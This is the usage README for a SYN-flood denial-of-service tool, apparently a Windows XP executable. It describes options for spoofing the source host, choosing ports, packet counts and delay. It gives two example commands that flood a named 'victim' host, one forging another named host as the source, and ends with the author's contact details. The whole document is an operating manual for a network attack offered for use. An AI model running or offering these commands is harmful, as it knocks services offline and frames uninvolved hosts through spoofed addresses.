
  Syn Flooder Version 1.6
  =======================

  Syn floods fills backlog of the destination service's socket. This causes
  the service not to accepting any more clients.

  Note: This program is only tested on Windows XP.


  I. USAGE
  =======================

  syn.exe <victim> [options]

  Options:
    -S:    Spoof host                         (0 is random (default))
    -p:    Comma separated list of dest ports (0 is random (default))
    -s:    Comma separated list of src ports  (0 is random (default))
    -n:    Num of packets                     (0 is continuous (default))
    -d:    Delay (in ms)                      (default 0)


  Example I: syn www.xnet.org -p 21,23,80,110

  On this attack:

  - Victim: www.xnet.org
  - Source IP: Random
  - Destination ports: 21 + 23 + 80 + 110
  - Source ports: Random
  - Count: Continuous
  - Delay: 0 ms (no delay between packets)

  Example II: syn www.xnet.org -S www.beginner.vg -p 21,80 -s 42,63 -n 1 -d 50

  On this attack:

  - Victim: www.xnet.org
  - Source IP/host: www.beginner.vg
  - Destination ports: 21 + 80
  - Source ports: 42 + 63
  - Count: 1
      * Please note that 1 count will send the syn packets from every *
      * source port to every destination port. This means 4 packets   *
      * will be transmited with a 1 count on this attack.             *
  - Delay: 50 ms


  II. CONTACT
  =======================
  MSN: metinsdr@hotmail.com
  UIN: 470734

